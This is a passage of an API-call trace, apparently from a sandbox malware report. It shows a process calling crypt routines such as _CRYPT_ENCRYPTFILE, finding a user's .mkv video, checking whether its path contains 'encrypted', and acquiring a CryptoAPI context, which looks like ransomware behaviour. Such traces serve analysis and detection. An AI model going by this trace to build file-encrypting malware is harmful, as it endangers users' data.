lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.458] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.458] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.458] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.458] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.458] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.458] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.458] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.458] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.458] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.458] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde2eb040, ftCreationTime.dwHighDateTime=0x1d5be3a, ftLastAccessTime.dwLowDateTime=0xc1a9ae40, ftLastAccessTime.dwHighDateTime=0x1d5bcd0, ftLastWriteTime.dwLowDateTime=0xc1a9ae40, ftLastWriteTime.dwHighDateTime=0x1d5bcd0, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Dzrcf9Vo2bS-.mkv", cAlternateFileName="DZRCF9~1.MKV")) returned 0x7c20c0 [0043.459] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.459] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.459] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde2eb040, ftCreationTime.dwHighDateTime=0x1d5be3a, ftLastAccessTime.dwLowDateTime=0xc1a9ae40, ftLastAccessTime.dwHighDateTime=0x1d5bcd0, ftLastWriteTime.dwLowDateTime=0xc1a9ae40, ftLastWriteTime.dwHighDateTime=0x1d5bcd0, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Dzrcf9Vo2bS-.mkv", cAlternateFileName="DZRCF9~1.MKV")) returned 0x7c20c0 [0043.459] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.459] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oOAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OAw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Aw\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dzrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zrcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rcf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cf9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vo2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2bS-.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.461] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.461] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.461] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.461] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.461] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.461] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.461] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.461] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.462] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Dzrcf9Vo2bS-.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde2eb040, ftCreationTime.dwHighDateTime=0x1d5be3a, ftLastAccessTime.dwLowDateTime=0xc1a9ae40, ftLastAccessTime.dwHighDateTime=0x1d5bcd0, ftLastWriteTime.dwLowDateTime=0xc1a9ae40, ftLastWriteTime.dwHighDateTime=0x1d5bcd0, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Dzrcf9Vo2bS-.mkv", cAlternateFileName="DZRCF9~1.MKV")) returned 0x7c2100 [0043.462] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.462] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.462] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.462] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.462] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.462] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.462] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.462] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.462] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.462] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.462] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.462] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.463] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.463] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.463] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.463] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0043.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.463] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0043.464] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.464] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.464] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.464] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.465] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.465] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.465] PeekMessageW (in: 